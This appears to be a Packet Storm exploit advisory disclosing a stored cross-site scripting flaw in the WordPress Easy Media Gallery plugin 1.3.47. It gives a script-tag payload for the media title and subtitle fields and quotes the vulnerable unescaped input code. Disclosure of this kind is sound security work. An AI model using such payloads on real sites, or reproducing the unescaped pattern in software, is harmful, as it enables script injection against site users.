what you don't know can hurt you

WordPress Easy Media Gallery 1.3.47 Cross Site Scripting

WordPress Easy Media Gallery 1.3.47 Cross Site Scripting
Posted Sep 8, 2015
Authored by Arash Khazaei

WordPress Easy Media Gallery plugin version 1.3.47 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
MD5 | 2bd09febf2e570c813a0e3e955d09fdb

WordPress Easy Media Gallery 1.3.47 Cross Site Scripting

Change Mirror Download
<!--
# Exploit Title: Wordpress Easy Media Gallery Stored XSS
# Date: 2015/9/05
# Exploit Author: Arash Khazaei
# Vendor Homepage: https://wordpress.org/plugins/easy-media-gallery/
# Software Link: https://downloads.wordpress.org/plugin/easy-media-gallery.1.3.47.zip
# Version: 1.3.47
# Tested on: Windows , Mozilla FireFox
# CVE : N/A
# Contact : twitter.com/Sec4U1
# Email : info@sec4u.net
# Site : http://sec4u.net

# Intrduction :

# Wordpress Easy Media Gallery Plugin Have 10,000+ Active Install
# And Suffer From A Stored XSS Vulnerability In Media Title & In Media Subtitle Sections.
# Authors , Editors And Of Course Administrators Can Use This Vulnerability To Harm WebSite .

-->
Exploit :

For Exploiting This Vulnerability Install Easy Media Gallery Plugin
Then Create New Media In Media Title Input : "/><script>alert('Exploit')</script>
Then In Media Subtitle Like Media Title Input : "/><script>alert('Exploit1')</script>
After Creating New JavaScript Code Will Be Executed .

Video Poc :

http://youtu.be/5nMQUgP6nD4


Vulnerable Code in include/metabox.php [478]:

<input type="text" name="easmedia_meta['. $field['id'] .']" id="'. $field['id'] .'" value="'. ($meta ? $meta : $field['std']) .'" size="30" />



<!-- Discovered By Arash Khazaei (Aka JunkyBoy) -->
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    35 Files
  • 8
    Jul 8th
    4 Files
  • 9
    Jul 9th
    9 Files
  • 10
    Jul 10th
    5 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close